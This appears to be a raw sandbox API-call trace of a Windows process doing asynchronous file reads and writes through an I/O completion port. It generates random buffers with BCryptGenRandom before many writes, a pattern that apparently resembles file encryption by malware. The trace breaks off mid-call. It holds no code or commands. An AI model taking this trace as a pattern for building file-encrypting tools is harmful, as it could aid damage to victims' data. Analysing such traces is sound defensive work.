WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0161.195] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.197] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x15ba0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0161.197] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.199] CloseHandle (hObject=0x2a4) returned 1 [0161.199] free (_Block=0x1ff1e60) [0161.199] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.208] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.208] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0161.209] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.209] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0161.209] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.209] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.209] free (_Block=0x3e305b8) [0161.209] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.209] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.210] free (_Block=0x1fa91d0) [0161.210] free (_Block=0x1fa2ed8) [0161.210] free (_Block=0x1fa90b8) [0161.210] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0161.210] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.650] CloseHandle (hObject=0x2a4) returned 1 [0161.651] free (_Block=0x3df0008) [0161.651] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.663] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1090, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0161.670] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.709] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1ae0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0161.709] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.719] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x2a42, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0161.728] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.739] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0161.739] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.748] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1324, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.748] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.749] CloseHandle (hObject=0x2a4) returned 1 [0161.749] free (_Block=0x3df0008) [0161.749] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.753] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1384, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0161.755] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.755] CloseHandle (hObject=0x2a8) returned 1 [0161.755] free (_Block=0x3e70008) [0161.755] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.770] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.770] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0161.770] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.771] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0161.771] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.771] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.771] free (_Block=0x3e305b8) [0161.771] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.771] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.772] free (_Block=0x1fa91d0) [0161.772] free (_Block=0x1fa2ed8) [0161.772] free (_Block=0x1fa90b8) [0161.772] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0161.772] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.779] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.780] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0161.780] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.780] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0161.781] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.781] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.781] free (_Block=0x3e305b8) [0161.781] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.781] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.781] free (_Block=0x1fa91d0) [0161.781] free (_Block=0x1fa2ed8) [0161.781] free (_Block=0x1fa90b8) [0161.781] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0161.782] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.786] CloseHandle (hObject=0x2a8) returned 1 [0161.787] free (_Block=0x3df0008) [0161.787] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.797] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.797] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0161.798] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.798] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0161.798] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.798] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.798] free (_Block=0x3e305b8) [0161.798] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.798] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.799] free (_Block=0x1fa91d0) [0161.799] free (_Block=0x1fa2ed8) [0161.799] free (_Block=0x1fa90b8) [0161.799] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0161.799] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.810] CloseHandle (hObject=0x2a4) returned 1 [0161.811] free (_Block=0x1ff1e60) [0161.811] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.820] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x21c2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0161.828] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.840] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.840] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0161.841] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.841] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0161.841] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.841] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.841] free (_Block=0x3e305b8) [0161.841] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.841] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.842] free (_Block=0x1fa91d0) [0161.842] free (_Block=0x1fa2ed8) [0161.842] free (_Block=0x1fa90b8) [0161.842] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0161.842] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.895] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x21f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0161.896] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.896] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.896] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0161.896] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.897] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0161.897] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.897] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.897] free (_Block=0x3e305b8) [0161.897] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.897] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.898] free (_Block=0x1fa91d0) [0161.898] free (_Block=0x1fa2ed8) [0161.898] free (_Block=0x1fa90b8) [0161.898] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0161.898] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.899] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x46a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0161.900] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.900] CloseHandle (hObject=0x2a4) returned 1 [0161.900] free (_Block=0x1ff1e60) [0161.900] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.910] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.910] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0161.910] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.911] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0161.911] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.911] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.911] free (_Block=0x3e305b8) [0161.911] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.911] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.912] free (_Block=0x1fa91d0) [0161.912] free (_Block=0x1fa2ed8) [0161.912] free (_Block=0x1fa90b8) [0161.912] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.912] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.913] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2f40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.914] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.944] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x14bc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.945] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.945] CloseHandle (hObject=0x2a4) returned 1 [0161.945] free (_Block=0x3df0008) [0161.946] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.955] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.956] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0161.956] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.956] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0161.957] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.957] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.957] free (_Block=0x3e305b8) [0161.957] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.957] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.957] free (_Block=0x1fa91d0) [0161.957] free (_Block=0x1fa2ed8) [0161.957] free (_Block=0x1fa90b8) [0161.957] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.958] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.959] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1580, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.959] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.972] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x27a4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.973] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.973] CloseHandle (hObject=0x2a4) returned 1 [0161.973] free (_Block=0x3df0008) [0161.973] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.982] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.983] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.983] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0161.983] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.983] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.983] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0161.983] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.983] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.983] free (_Block=0x3e305b8) [0161.983] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.984] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.984] free (_Block=0x1fa91d0) [0161.984] free (_Block=0x1fa2ed8) [0161.984] free (_Block=0x1fa90b8) [0161.984] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.984] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.985] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4f70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: 